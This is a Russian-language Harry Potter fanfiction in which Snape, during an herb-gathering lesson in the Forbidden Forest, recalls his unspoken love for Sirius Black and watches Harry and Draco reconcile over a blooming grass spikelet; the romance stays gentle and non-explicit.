Колосок

Автор: Рант
Бета: Нарцисса Малфой
Pairing: Северус/Сириус, Гарри/Драко
Рейтинг: PG-13
Жанр: romance
Краткое содержание: сделать первый шаг бывает так трудно... Кому-то это удаетсся, кому-то - нет.
Предупреждение: спойлеры 5 книги.
Disclaimer: Не мое. И не надо.
Размещение: с разрешения автора.

I

За днем следует ночь. За ночью следует день. Еще один. Обычные хогвартские будни: лекции, семинары, контрольные. Теория, практика, оценки. Зелья, котлы, рецепты. Ничего нового. Жизнь катится по наезженной колее, как повозка, которой даже и лошади не нужны - она едет сама собой. Так заведено.

Именно такие мысли проносились в голове Мастера Зелий, с раннего утра сидящего за столом и набрасывающего рабочий план нового урока. Он отбросил перо и потер усталые глаза - убористые строчки на пергаменте стали наезжать одна на другую. Со вздохом он откинулся на спинку кресла, выгнулся как cонная кошка - бледные пальцы вцепились в подлокотники, тело напряглось, как стрела на тетиве лука. Только в какую цель ему лететь - этого он не знал. Да и есть ли такая цель на белом свете?

Северус Снейп невольно поежился: на промозглую сырость подземелий и на обычную утреннюю прохладу наложился внутренний холод - лед, который еще никому не удавалось растопить. Даже ему.

Он потянулся за волшебной палочкой, махнул в сторону камина - веселое пламя разгорелось в один миг, комната ожила и задышала танцующими тенями. Мастер Зелий встал и потянулся - истончившийся от времени клетчатый серо-зеленый плед соскользнул с его плеч и плавно приземлился обратно в кресло. Профессор оглянулся с сожалением: ему показалось, что это упали уютные, такие теплые крылья - милый домашний оберег. Но пора было приниматься за дело. Он мельком глянул на часы и сделал первый шаг. Ванная, одеваться, завтракать, в класс. Как все просто. Если бы только можно было жить, наслаждаясь этой простотой.

Зеркало отразило усталое лицо, равнодушный взгляд, руки механически продолжали совершать ежедневный утренний ритуал - мыло, бритва, полотенце, свежая рубашка. Зеркало молчало. Мастер Зелий оделся, застегнулся на все пуговицы, каждым движением выстраивая вокруг себя высокий забор, через который никому не удастся перебраться. А ему не удастся выбраться наружу. За все приходится платить.

Он резко развернулся, полы черной робы свистнули, рассекая воздух, как кинжалы в руках искусного бойца, и вернулся в кабинет. В комнате стало заметно теплее, но вот ледяные камни пола ощущались даже сквозь подошвы ботинок. Наверное, для того, чтобы их прогреть, потребовалось бы топить целый месяц, не переставая. Но ему это не было нужно. Он привык.

Просто сегодня было уж слишком… холодно.

 

II

Конец мая. Весна чувствовалась везде. Она расцветала яблонями, пела птицами, носилась по коридорам Хогвартса под видом обезумевших от предвкушения каникул учеников. Мастер Зелий просто не успевал снимать баллы. В какой-то момент ему даже показалось, что сейчас его терпение лопнет, и он просто махнет на все рукой. Но он себя пересилил. Ему не было дела до весны, золотого утреннего солнца, смеющихся детей, только разве что в смысле приближающихся экзаменов. Так что он продолжил окорачивать несносных бегунов. Ему не было даже нужды повышать голос - свистящий шепот действовал безотказно.

И тут наперерез ему, на всех парах, по направлению к башне Гриффиндора промчалась тонкая заляпанная грязью фигурка - вихрь рук, ног, всклокоченных черных волос. Метла задела отглаженную мантию, на начищенных ботинках появились грязные полосы.

- Поттер! Вы что, с цепи сорвались?! Не видите дальше собственного носа?

Фигурка резко затормозила, развернулась, неопределенно мотнула головой и поплелась к грозному профессору.

- Собрались поработать домовым эльфом, так научитесь хотя бы подметать сперва! - рявкнул Мастер Зелий и раздраженно отряхнулся.

- Извините, сэр. Я вас не заметил, я очень тороплюсь… - ярко-зеленые глаза поднялись и уставились на Северуса Снейпа без тени раскаяния. (Золотистая кожа, тонкая кость, побелевшие пальцы судорожно сжимают древко метлы).

- Зато я вас заметил! На пожар торопитесь? - повисшее в воздухе ехидство при желании можно было потрогать руками.

- Профессор, у нас утренняя тренировка только что закончилась… Вы же знаете, скоро финальный матч! А мне еще надо успеть на Историю Магии… Пожалуйста, извините, можно я побегу? - время неумолимо шло и в голосе проскользнули первые умоляющие нотки. Из дверей столовой вывалилась большая толпа учеников. Оценив ситуацию, она рассосалась в одно мгновение.

- "Пойду", мистер Поттер, "пойду". И никакой беготни больше. Идите. До начала урока пять минут. Да, и десять баллов с Гриффиндора! - Мастер Зелий устало махнул рукой в сторону Гриффиндорской башни и собрался уже пройти мимо.

- Да, сэр… - тон, которым были сказаны эти слова, заставили его остановиться.

Он взглянул на Поттера и заметил, что тот еле сдерживается, чтобы не надерзить, а в глазах его блестит предательская слезинка. Мальчик тут же опомнился, гордо поднял голову, что не позволило слезинке выкатиться, и нарочито медленно пошел к себе. Метла грустно волочилась сзади. Но когда его неестественно выпрямленная спина скрылась из виду за поворотом, тут же раздался бешеный топот. Северус Снейп хмыкнул.

"Мерлин мой! Как они похожи…И, конечно, он даже не успел позавтракать…"

Мастер Зелий постоял еще секунду, раздумывая. Потом, будто решившись, вздохнул и направился в учительскую.

- Профессор Бинс? Должен вас предупредить, что Гарри Поттер опоздает на ваш урок. Ненадолго…

- О, это ничего, Северус…Спасибо, что сказали, я не буду снимать с него баллы.

- Хорошо. Благодарю вас.

III

"Нееет. Сегодня никакого урока не получится", - Мастер Зелий оглядел класс: конечно, при его появлении все расселись по местам и внешне успокоились, но пятнадцать лет преподавания отточили взгляд Северуса Снейпа до немыслимой степени. Он видел все - как бешеным галопом проносятся и уносятся прочь мысли мальчишек, как хихикают раскрасневшиеся девчонки…

"Мееерлин, даже Грейнджер… Мда, началось. Подумать только, им уже по шестнадцать…"

В классе витал дикий коктейль из квиддича, моды, свиданий, надежд, "какая прекрасная погода" и "черт бы побрал эти зелья"… А слова, описывавшие отношение учащихся к его собственной скромной персоне, могли бы вогнать в краску любого, только не его. У него они вызывали только легкую кривую усмешку, да желание во всеуслышание объявить о том, что он умеет читать мысли. Неожиданно для себя Мастер Зелий удивился - посреди ментального хаоса возвышались два оплота покоя и сосредоточенности. Один из них был, ясное дело, Драко Малфой - нервы напряжены до предела, круги под глазами, но ни одной посторонней мысли, будто завтра вовсе не он будет сражаться за кубок школы по квиддичу. И Гарри Поттер - нахмуренный лоб, воспаленные глаза, голодное бурчание в желудке слышно, наверное, даже за пределами подземелий. Мысленно проверяет домашнее задание. Ноль внимания на окружающих. Мастер Зелий покачал головой: это уже слишком - думающий Поттер - такое и в ночном кошмаре не приснится!

Профессор вернулся к реальности и вдруг понял, что стоит в полной тишине, и на него устремлены десятки пар удивленных глаз. И ни одной - обеспокоенных. Еще бы, всегда пунктуальный Снейп вот уже целых три минуты урока стоит, уставившись в одну точку, и не говорит ни слова. Неужели весна и до него добралась?

- Привели в порядок свои мысли? - Мастер Зелий обвел притихший класс насмешливым взглядом. - Тогда перейдем к учебе...

Море учеников заволновалось, одни покраснели, другие испуганно переглядывались. Драко Малфой вздернул белесые брови и медленно повернул голову. Ничего не выражающие глаза его были устремлены на Поттера. А тот, словно кожей почувствовав его касание, встретился с ним взглядом. Глаза его тоже ничего не выражали. Но ненависть и презрение, вспыхнувшие в ту же секунду между ними, могли бы превратить класс Зелий в руины, буде такая возможность. Мальчишки, соперники, враги, черное и белое, две стороны одной медали.

"О да, такое уже случалось", - мгновенное узнавание кольнуло сердце. Северус Снейп моргнул, отгоняя непрошеное видение, но напрасно. Он видел себя, шестнадцатилетнего, еще не привыкшего к изменениям в собственном теле, вечно бледного, будто от недоедания, молчаливого и замкнутого. Слишком умного. Такие всегда сидят на первой парте. Вот он украдкой оборачивается, откидывает с глаз нависшую челку и натыкается на равнодушный взгляд - черные сияющие волосы, беломраморная кожа, надменная ухмылка - еще один представитель вырождающегося аристократического рода. По ту сторону баррикады. Две пары черных глаз, уже позабыв о равнодушии, сверлят друг друга так, словно хотят и мокрого места не оставить от врага. Северус отводит взгляд первым - он уже не может терпеть эту боль. Лучше опять забраться в свою скорлупу - не знать, не видеть, не думать, так больно! Больно? Не то слово. Лучше резать по живому.

Сириус Блэк торжествует.

IV

"Надо что-то делать…", - Мастер Зелий буквально заставил себя вынырнуть из воспоминаний. Он с усилием поднял руки и скрестил их на груди.

- Мистер Поттер, завтра будете прожигать дырки в мистере Малфое… На матче… - Мастер Зелий чуть наклонил голову, будто вколачивая гвоздь в вышеназванную персону - бешеные яростные глаза тут же переключились на него. Профессор принял изумрудный удар, не дрогнув. Как скала. Еще бы, столько лет тренировок… Мельком покосился на Малфоя - Драко опустил глаза и отвернулся. Тонкое, словно вырезанное из слоновой кости лицо опустилось к парте, светлые шелковые пряди выбились из-за ушей. Снейп прислушался: "Что это? Боль? Ему больно… Бедный мой мальчик…".

- Ми-и-истер По-о-оттер, у вашего факультета есть еще лишние баллы? - Мастер Зелий произнес это мягко, почти пропел. Гарри даже не пошевелился, но взгляд отвел, словно одолжение сделал.

"Сколько в нем жизненного огня… А он превратил его в ненависть, которая пожирает его изнутри. Когда как на свете есть столько…столько… Глупый мой мальчик…"

- Прекрасно, - Северус Снейп удовлетворенно кивнул. - Уберите учебники, они вам не понадобятся. Сегодня мы проведем урок на улице, - класс недоверчиво и восторженно загудел.

- Тишина! Я вас не на прогулку приглашаю! - Мастер Зелий отвесил один из своих знаменитых гипнотических взглядов и продолжил:

- Как вы знаете из лекций по гербологии, конец мая - это время первого травосбора. Мы с вами уже изучили достаточно различных зелий и их составляющих, в том числе и трав. И надеюсь, если вы напряжете свои мозговые извилины (у кого они есть, естественно), - выразительный кивок в сторону Лонгботтома, - то поймете, что до сих пор на моих уроках вы пользовались растительным сырьем для приготовления зелий в уже готовом к применению виде. Я хочу сказать, в собранном, высушенном и расфасованном. Сегодня я положу этому конец. Сейчас мы с вами отправимся на опушку Запретного Леса, где вы самостоятельно займетесь сбором растений, потом вы их самолично подготовите, рассортируете, высушите, а, начиная со следующего учебного года, будете использовать в приготовлении зелий собственноручно изготовленные компоненты.

Класс притих. По губам профессора зазмеилась довольная улыбка. Он указал волшебной палочкой на школьную доску - она тут же покрылась мелкими убористыми строчками.

- Извольте переписать список растений, которые должны будете найти и собрать. Когда вы будете готовы, прошу вас взять из шкафа корзины и построиться у двери. Попарно, как сидите. Даю вам десять минут. Время пошло.

Десятки перьев согласно заскрипели по пергаментам. Близорукий Поттер аж перегнулся через парту, стараясь рассмотреть, что же написано на доске - очки ему не помогали.

- Мистер Поттер, у вас сейчас глаза выпадут! Будьте любезны пересесть на первую парту, к мистеру Малфою. Мистер Гойл? Чего вы ждете? Марш за стол мистера Уизли!

Драко Малфой задохнулся и на какое-то мгновение просто перестал дышать. Недовольно сопя, приблизился Поттер, гробанул портфелем об пол, отодвинул стул подальше к краю стола. Вздохнул. Сел.

Мастер Зелий незаметно улыбнулся.

V

Лес был прекрасен. Солнце светило вовсю, и деревья, кажущиеся в сумерках такими мрачными и строгими, мерно покачивали ветвями на ветру. Резные лиственные тени прихотливо разрисовывали землю и сосредоточенные физиономии учеников, ползающих на коленях по лужайкам и прогалинам. Игра света и тени оживила мертвенно-бледное лицо Мастера Зелий, от долгой ходьбы и свежего воздуха на впалых щеках разгорелся робкий румянец. Он внимательно следил за сбором - в принципе, справлялись все, даже Лонгботтом. Драко Малфой спокойно и методично обходил все уголки, присаживался и, не заглядывая в список, аккуратно собирал травы - новорожденные листья брусники и мяты, лесной земляники и дикой малины. Поттер, как золотой снитч, хаотично носился то туда, то сюда, поминутно сверяясь со списком и подглядывая за тем, что рвет Гермиона. Северус Снейп пожал плечами, усмехнулся и не стал делать замечания. В этом напоенном светом и теплом лесу замечания звучали бы как-то странно.

Где-то вдалеке завела свой отсчет кукушка, обещая всем слушавшим ее долгую жизнь, солнце зависло в самом зените, заливая опушку не по-весеннему жаркими лучами. Сгорбленные над землей ученики раскраснелись, кое-кто сбросил мантии. С разгоряченного Поттера пот лил в три ручья - он тоже скинул мантию, расстегнул ворот рубашки и закатал рукава. Мастер Зелий стоял на самом солнцепеке, наглухо застегнутый на все пуговицы, крючки и застежки - по нему было не сказать, что ему жарко. Но и холодно ему тоже уже не было. Он запрокинул голову, подставляя лицо слепящим солнечным лучам, на секунду зажмурился - забыть бы все, превратиться в дерево, да остаться стоять тут, навсегда, еще одним безмолвным истуканом…

Когда он снова открыл глаза и опустил голову, он почувствовал на себе чей-то взгляд. На него смотрел Поттер - без злобы и недоверия, скорее заинтересованно, будто увидел его впервые в жизни. Просто смотрел, и он был открыт, словно пребывание в весеннем лесу успокоило и его.

"А он на меня никогда так не смотрел…", - Мастер Зелий не без труда справился с подкатившим к горлу комком, сглотнул и хрипло произнес:

- Вы уже закончили, мистер Поттер?

- Да, профессор… - юноша потряс своей корзиной перед ним, при этом рассыпав добрую половину собранного.

Снейп поджал губы. Гарри ойкнул и быстро опустился на колени, подбирая пучки ароматных листьев. Снейп перевел взгляд в сторону - на Малфоя. Так и есть - наблюдает за Поттером, мрачно и исподлобья.

- Итак, все закончили? - Мастер Зелий просмотрел содержимое корзин и кивнул. - Хорошо. В следующем учебном году мы увидим, то ли вы собрали. А теперь, - Снейп на секунду задумался и оглядел настороженные лица учеников - "что-то он еще придумает?". - А теперь… Собственно говоря, у нас есть еще немного времени до конца урока. Можете погулять, - в ответ послышалось несколько десятков недоверчивых выдохов. - За пределы опушки не заходить! Поттер, это к вам относится! Не забывайте, что находитесь в Запретном Лесу! И чтоб через полчаса, все были здесь! Мы вернемся в Хогвартс все вместе! Уяснили?! - Мастер Зелий угрожающе прищурился и выслушал нестройное: "Да, сэр!" Через секунду его уже не было - быстро и плавно он скользнул в тень деревьев. Только поднятый его движениями ветерок еще некоторое время обвевал лица обрадованных школьников.

VI

Когда грозный профессор предоставил своих учеников самим себе, то, что случилось на поляне, можно было описать одним словом: "взрыв". Заговорили все и сразу: слизеринцы скучковались вокруг Малфоя, обсуждая тактику завтрашней игры, девочки смеялись и спорили одновременно, несколько гриффиндорских полукровок затеяли импровизированную игру в маггловский футбол - содержимое одной из корзин было безжалостно вывалено на землю, а сама корзина стала мячом. Гермиона что-то увлеченно рассказывала Гарри и Рону, отчаянно жестикулируя. Рон смеялся и кивал, а Поттер как будто и не слушал. Мысли его бродили неизвестно где. Вдруг он нагнулся и сорвал небольшую травяную метелочку - едва оформившийся колосок неизвестного науке сорняка, и поднес поближе к глазам. Гермиона мельком глянула и безапелляционно заявила:

- Мятлик луговой обыкновенный. Зачем он тебе, Гарри? У него нет никаких магических свойств…

- Хотите, фокус покажу? - Гарри посмотрел на друзей поверх очков и подмигнул. - Я умею…

- Валяй, - кивнул Рон.

Гарри зажал тоненький колосок в потной разгоряченной ладони, подержал некоторое время - Рон и Гермиона недоуменно переглянулись - а потом тихонько дунул. И колосок расцвел. В одно мгновение он покрылся нежно-розовыми крючочками мелких соцветий. Гарри торжествующе улыбнулся, Гермиона ахнула, а Рон воскликнул:

- Вот это да! Эгей! Идите все сюда! Гарри показывает фокусы!

Все сразу обернулись в их сторону, даже слизеринцы. Гарри сорвал еще один колосок и точно также зажал в ладони - через несколько минут и он покрылся мерцающей розовой дымкой. Все восхищенно выдохнули, Крэбб и Гойл смотрели, открыв рты. По спокойному лицу Малфоя ничего нельзя было понять - видел он это маленькое чудо или просто терпеливо ждал в стороне, когда представление закончится.

- Гарри, как ты это делаешь? - Невилл подошел поближе и осторожно потрогал розовую свечку. - Какое заклинание ты применил?

- Нет, что ты, это не волшебство. Смотри, - Гарри сорвал еще один колосок и вложил его в руку Невилла. - Зажми покрепче и жди. Вот так, сейчас-сейчас… Вот он!

Невилл удивленно и восторженно уставился на свою руку с расцветшим колоском.

- Никаких заклинаний! Это зависит от тепла. Просто в ладони колосок нагревается, соки циркулируют быстрее, и время цветения наступает в один миг. Здорово, правда?

Гарри оглянулся кругом и рассмеялся:

- Это каждый может сделать, попробуйте! - Гарри потянул за руку Гермиону и показал ей на тонкую былинку. Следом за ней все остальные тоже нарвали колосков и теперь дурачились, как дети, восторгаясь по поводу столь малой, но кажущейся такой необыкновенной радости. Даже слизеринцы, недоверчиво ухмыляясь, последовали всеобщему примеру: Панси Паркинсон сжала в пухлой ладошке колосок, охнула и лицо ее осветилось - показалось даже, что она стала красивее… Лишь Драко Малфой не участвовал в забаве. Он тихо развернулся и пошел в чащу леса. Один. Никто не заметил его исчезновения.

VII

Некоторое время Мастер Зелий еще постоял, невидимый за стволами деревьев, напряженно прислушиваясь к веселому шуму, доносившемуся с поляны. А потом пошел по тропинке, просто, бездумно, куда глаза глядят. Идти было легко - трава сама стелилась под ноги, в голове мелькали неясные картинки прошлого, накладывались на настоящее - сбивчивые мысли, казалось, обогнали профессора и теперь неслись во весь опор вперед, а он терпеливо шагал вслед за ними.

Он думал о Сириусе. Что греха таить, да, собственно говоря, ему и не перед кем было этого делать - Снейп горько усмехнулся - он всегда его притягивал. Взгляды, мысли, поступки… Северус сам не понимал, почему все, что делал или говорил Блэк, заставляло его замирать на месте, нервно прислушиваться, ходить по пятам безмолвной тенью. Они все обвиняли его в шпионаже - а он и, правда, шпионил. За тем человеком, которого ненавидел (а его и не за что было любить), которого презирал (а что можно еще испытывать по отношению к гриффиндорцу из потомственной слизеринской семьи?), но от которого глаз не мог оторвать.

Он злился на себя, ненавидел, но поделать ничего не мог. Все, что ему доставалось - это тычки, плевки и отвращение - вся мародерская компания почитала своим долгом поставлять ему все это в огромных количествах. Иногда, правда, ему казалось, что Блэк неохотно участвует в проделках подобного рода или испытывает своего рода угрызения совести: слишком часто он одергивал Поттера, если того совсем уж заносило, старался переключить его внимание. Но все это оставалось на уровне догадок, на уровне отчаянной болезненной благодарности даже за такую малость - больше у Северуса не было никого, кому бы он мог сказать "спасибо". Прошептать это слово в подушку, холодной одинокой ночью, утирая злые слезы.

И младший Поттер так похож на него. Понятно, что и от папаши в нем очень много, но от Сириуса, от крестного - больше. О, этот тоже никогда не попросит прощения, не раскается в том, что сделал, но в отличие от Джеймса, он всегда понимал, когда поступал нехорошо, и хотя его проклятая гордыня не позволяла ему признаться в этом - он, по крайней мере, всегда вовремя останавливался.

Повзрослев, Северус отчасти понял мотивы странного поведения Блэка: тому тоже было трудно. Имея за плечами древний аристократический род, переполненный под завязку Темными магами и ведьмами - учиться в Гриффиндоре. Семья от него отказалась, слизеринцы считали его предателем, да и среди гриффиндорцев друзей у него было не так уж много, а те, что были - тоже отщепенцы, все как на подбор: главный бандит школы Поттер, оборотень Люпин и подлипала Петтигрю - вот и все его друзья.

Но даже став взрослым (и, как он надеялся, рассудительным) мужчиной, Северус так и не смог простить Сириуса Блэка. За то, что тот не сделал первого шага, не разрушил стену отчуждения, стоящую между ними; за то, что ни разу не дал повода разрушить эту стену ему.

"Мерлин мой! А может быть я сам во всем виноват?! Ведь, возможно, нужно было совсем немного - просто подойти, заглянуть в глаза, прикоснуться к теплым пальцам? И тогда весь этот кошмар закончился? Что я говорю? Он никогда бы не подпустил меня к себе так… близко".

Мастер Зелий глухо застонал и ускорил шаг. Теперь он почти бежал, и ему казалось, что деревья сами расступаются перед ним.

VIII

Снейп, тяжело дыша, остановился на небольшой полянке. Его окружали могучие стволы вековых деревьев, пышные кроны почти не пропускали света, поэтому солнце освещало только центральную ее часть, под тенистое кружево по краям оно не могло пробиться. Сколько времени он бежал? Куда он забрел? Это уже не имело значения, как не имела значения его собственная жизнь. Не жизнь, а жалкое существование. Пустота.

По телу прошла судорога, словно внутри него жил дикий зверь, который хотел выбраться наружу любой ценой. Оооох, он сейчас так завидовал Люпину - тот, по крайней мере, хоть один раз в месяц мог выпускать зверя наружу, а ему оставалось только держать своего на привязи да смотреть, чтоб не убежал - отчаявшись от тоски и одиночества. Звери, живущие в наших душах, бывают разные. Но лучше быть оборотнем, чем эта мука.

Мастер Зелий затравленно огляделся. Он, наверное, в самой чаще леса, даже птиц не слышно, тишина давит на воспаленные мозги. "Ж-ж-ж-ж", - поймал он краем уха и обернулся. В одном из стволов он заметил небольшое аккуратное дупло - дикие пчелы - да, весна разбудила и их. Немного поколебавшись он быстро пошел к дереву. "Ж-ж-ж-ж", - завывало внутри. Тело вздрогнуло против воли. Северус Снейп подавил сухой противный комок досады на самого себя и, словно стараясь ухватиться хоть за что-нибудь, что помогло бы ему удержаться на плаву, вложил руку в дупло.

Потревоженный рой загудел, как пламя в камине, и вылетел наружу - часть тяжелых мохнатых пчел облепили руку до самого плеча, остальные зависли перед лицом неприятеля. Время остановилось. Узкие бледные губы растянулись в зловещей ухмылке, глаза с мрачным любопытством рассматривают рассерженных медоносов, гибкие длинные пальцы пробрались в святая-святых дупла - в соты.

Медленно, словно во сне, Мастер Зелий вытащил руку обратно и сделал шаг назад. Он продолжал сверлить тяжелым взглядом гудящих в воздухе пчел. Еще один шаг назад, все также, не шелохнувшись, рука вытянута вперед, с пальцев стекает дикий мед. Еще один. Пчелы, облепившие руку, снялись с места и присоединились к своим собратьям у дупла - черный живой мешок разросся до предела. В голове противно гудело: то ли от жужжания, то ли от прилива адреналина. Еще один шаг. Не отрывать взгляда. Дикие пчелы согласно дернулись вверх, в сторону, и - залетели обратно в дупло. Он победил.

Сердце бешено колотилось. Чистой рукой Северус вытер со лба холодный пот и отошел подальше. Поднес ко рту перепачканные медом и воском пальцы, слизнул золотые тягучие капли. Вкус был непередаваемым, удивительным, волшебным. Губы слиплись от сладости и жаждали еще, еще… Он провел языком, подбирая, втягивая в себя последние крохи солнечного тепла, превращенного в мед. Так сладко. Словно поцелуй любимого человека. Наверное.

Он его никогда не целовал. Никогда не поцелует.

IX

Властитель диких пчел и неокрепших детских душ, профессор Зельеварения и декан Слизерина, бывший Упивающийся Смертью и нынешний шпион Дамблдора, а по совместительству замкнутый, одинокий и несчастливый человек по имени Северус Снейп очнулся от грез. Пора была возвращаться - он повел плечами, будто отгоняя непрошеные чувства, вытесняя из сердца воспоминание о человеке, которого он никогда не касался, и о прикосновениях которого он мечтал всю свою жизнь.

Он уже было пошел, как вдруг услышал за спиной жалобный шелест потревоженных листьев и шорох слежавшейся хвои на узкой лесной тропе - кто-то приближался. Мастер Зелий мгновенно отступил в тень, шагнул в самую гущу теснящихся вокруг полянки деревьев и замер - за нависшими ветками его совсем не было видно. На свет выступила тонкая фигурка в школьной мантии, заостренным языком белого пламени вспыхнули волосы, серебристые глаза что-то сосредоточенно выискивали в траве. "Что он тут делает?" - только и успел подумать Снейп, и в этот момент Драко Малфой радостно воскликнул и нагнулся к земле.

Мальчик сорвал небольшой, недавно оформившийся колосок - ("Мятлик луговой, сорняк обыкновенный", - автоматически отметил про себя Мастер Зелий) - зажал его в кулаке и бросил взгляд окрест. Никого не было. Удовлетворенно кивнув, Драко задорно улыбнулся, уселся на землю, скрестив ноги - так сидят индийские маги - и важно уставился на свою руку, держащую колосок. Он чего-то ждал. Ничего не происходило. Он удивленно поднял брови, тонкие губы обиженно изогнулись - он переложил колосок в другую руку и продолжил гипнотизирование растения. Профессор Снейп ничего не понимал.

Драко насупился - измочаленная былинка полетела в сторону, он негромко ругнулся, фыркнул и гибким кошачьим движением нагнулся вперед. Изящные пальцы ухватились за стебель, рассерженно дернули на себя - Драко сорвал еще один колосок и повторил все заново. Ничего не произошло. Драко зашипел, белоснежные щеки окрасились неестественным румянцем, глаза метали холодные серебряные молнии.

Мастер Зелий невольно улыбнулся. Иногда он узнавал в Драко самого себя в том же возрасте, это даже грело его одинокое сердце, но когда, думая о мальчике, он начинал понимать, что вольно или невольно младший Малфой повторяет его собственную судьбу - слишком умный, слишком замкнутый, слишком одинокий… Нет, только не это. Такого и врагу-то не пожелаешь, не то что мальчишке, стоящему в самом начале жизненного пути.

Тем временем Драко, судя по всему, устал сражаться с непокорным растением, и признал свое поражение - плечи его расслабились, руки опустились, лицо приняло какой-то усталый потерянный вид. И тут профессор Снейп почувствовал чье-то постороннее присутствие - кто-то еще следил за Драко. Не дыша, осторожно, стараясь не задеть ни листочка, он повернул голову - на границе света и тени стоял Гарри Поттер и, улыбаясь, смотрел на Малфоя.

Прошло несколько мгновений, Гарри прянул с места, как молодой олень, и легким быстрым шагом пошел по направлению к Драко. Слизеринец поднял голову, вздрогнул от неожиданности и подскочил на месте. Он было дернулся изречь что-нибудь резкое и оскорбительное, как обычно, но что-то его остановило - то ли мягкая улыбка плывущего в золотистом мареве солнечного света Поттера, то ли просто рука Судьбы.

"Сейчас или никогда…" - подумал Мастер Зелий, в горле у него пересохло, руки дрожали.

X

- Не получается? - Гарри слегка наклонил голову и стрельнул глазами в сторону многострадального колоска, все еще стиснутого в руке Малфоя.

- Что не получается? - буркнул Драко, пряча улику за спину.

- Можно я попробую? - Гарри протянул слизеринцу руку, глаза пытливо изучали Малфоя, отмечая каждую деталь - непривычно встрепанные волосы, растерянность в глазах, лихорадочный румянец на бледной, почти прозрачной коже, чуть подрагивающие в нерешительности губы. Наконец Драко решился и, скорчив гримасу из серии: "А мне все равно", молча протянул Поттеру уже основательно потрепанный стебель.

Гарри не стал забирать колосок. Вместо этого он накрыл прохладную руку Малфоя своими разгоряченными ладонями и осторожно сжал. Драко попытался вырваться, но Гарри не отпустил. Он удерживал его руку в своих - нежно, но крепко. Драко стиснул зубы, жар, исходящий от ладоней Поттера, казалось, прожигал его насквозь.

- Смотри, смотри! - зашептал Гарри радостно, и шепот его был таким же жарким, как и его руки.

Драко перевел взгляд на колосок и увидел, что тот весь покрылся розовыми язычками. Он невольно расплылся в улыбке:

- Мееерлин… Расцвел…

- Ага… - Поттер поднял глаза и замер - он даже не представлял, что у Малфоя может быть такая чистая открытая улыбка.

- Так просто… Почему же я не смог? - Драко откровенно любовался тонкой розовой свечкой и не спешил отнимать ладонь. А Поттер не спешил убирать свои.

- Знаешь, мне кажется, что это из-за того, что у тебя руки… э-э-э… холодные. Ты что, замерз?

- Да нет… - Драко безмятежно пожал плечами. - Они у меня всегда такие, сколько себя помню…

- Ух ты! А у меня все наоборот… Постоянно жарко. Лето - ненавижу! Вечно я, как бекон на сковородке! - Гарри состроил гримасу, видимо, должную выражать то, как чувствует себя поджаривающийся бекон. Драко рассмеялся, в глазах запрыгали чертики.

- И точно… А где ты научился такой штуке?

Гарри помрачнел и закусил губу. Он молчал. Расслабившийся было Драко насторожился - вроде бы он не спросил ничего крамольного, но кто знает этого Поттера: вот только что был нормальным человеком, а через минуту - уже закипает, как чайник…

Спустя мгновение Гарри, словно собравшись с силами, открыл рот и заставил себя ответить. Хотя почему он это сделал, он сам не мог понять. Он не обязан был отвечать Малфою. Тем более на этот вопрос. Только вот его рука так доверчиво грелась в его ладонях, что он не смог разрушить то доверие, что робко, как этот вот колосок, расцвело между ними.

XI

- Это крестный меня научил. Сириус. Блэк. - Гарри украдкой взглянул на Драко, ожидая увидеть на его лице выражение хищной радости: "Ага, так вот она - ниточка к Блэку!". И ничего такого не увидел. Пушистые ресницы опустились, на секунду прикрывая серые глаза, и снова поднялись. Глаза смотрели чуть удивленно, но без злости или насмешки, и Гарри даже показалось, что с какой-то долей уважения. Драко медленно протянул другую руку и положил ледяные пальцы на ладони Поттера:

- Ты не думай… - слизеринец заговорил взволнованно. - От меня никто слова не услышит, - Драко перешел на шепот. - Даже отец…

- Спасибо, - Гарри облегченно выдохнул и вдруг понял, что впервые в жизни поблагодарил Малфоя.

Еще пару часов назад они готовы были поубивать друг друга - что же произошло? Кто из них изменился? Он или Драко? Или это волшебство? Гарри задержал взгляд на празднично раскрашенном колоске и улыбнулся, а потом чуть приподнял одну ладонь, пропуская руку Драко, и накрыл ее сверху. Теплая волна нежности накатила на пальцы, отступила, нахлынула снова и добралась до самого сердца.

- Да ладно... Я ничего не слышал… - нарочито небрежные слова прозвучали грубовато, но во внезапно охрипшем голосе Драко Гарри услышал растерянность: тот явно не ожидал ни слов благодарности, ни ласки. Тем более от Поттера.

- Я не забуду… - Гарри чуть склонил голову, словно отдавая честь.

- Я тоже… И… и тебе спасибо, - после короткой заминки произнес Драко.

- А мне-то за что? За колосок, что ли? - Гарри уже пришел в себя и весело ухмыльнулся.

- Да. И за то, что ответил мне. И за доверие, - голос Драко был серьезен, как никогда. Гарри смутился и покраснел. Сердце его мерно ухало по маршруту "пятки-голова, голова-пятки", и совершенно не хотело становиться на место. В прозрачном весеннем воздухе повисло молчание.

- Ну, нам, вообще-то пора дорогу назад искать, не находишь? А то Снейп три шкуры спустит… - это Поттер нашел достойную тему для продолжения разговора.

- Да. Только две поправки: не Снейп, а профессор Снейп. И не спустит, - Драко тоже вернулся к своей обычной манере разговора.

Мальчики разжали, наконец, руки, колосок упал на землю. Увлеченные разговором, они даже не заметили этого.

- Ну вот, опять ты за свое! Хорошо тебе говорить, ты - слизеринец, тебе он ничего не сделает!

- Тебе он тоже ничего не сделает, Гарри… - услышав свое имя, Поттер икнул от неожиданности, но никак не прокомментировал услышанное.

- Почему ты так уверен? Да он только сегодня утром снял с меня десять баллов! А я всего лишь бежал по коридору!

- Ну, вот видишь - не шкуру же снял, а баллы, - Драко глянул на недоумевающего Поттера и прыснул со смеху. - Ладно, пошли! - и протянул руку.

- Очень смешно… - пробурчал Гарри. А через секунду он тоже улыбнулся, и пальцы их вновь переплелись.

Они скрылись в лесу бок о бок, молча, словно оба понимали, что теперь у них впереди будет столько слов, улыбок, прикосновений, взглядов - что пока можно было и помолчать…

Мастер Зелий выскользнул из-под занавеса ветвей и медленно, словно ступая по неизведанной чужой земле, вышел на поляну. Он остановился на том месте, где только что стояли два его ученика. Потом резко нагнулся и присел на корточки. Несколько мгновений пошарив в притоптанной траве, он поднял многострадальный забытый колосок и улыбнулся. Улыбка вышла горькой, но счастливой. Потому что другого счастья он никогда не знал.

Теперь за этих двоих можно быть спокойным.

XII

Он не помнил, как вышел на знакомую поляну, привычно пересчитал учеников, отвел их обратно в Хогвартс. Он не помнил, как спустился в подземелья, открыл дверь кабинета и вошел… Очнулся он, стоя посередине забитой книгами и склянками комнаты: в руке завявший колосок, вокруг тишина. Северус Снейп осторожно поднес ничего не значащую былинку к лицу и прижался к ней губами. Вдохнул. Тонкий стебелек пах землей и весенним ветром. Он пах надеждой.

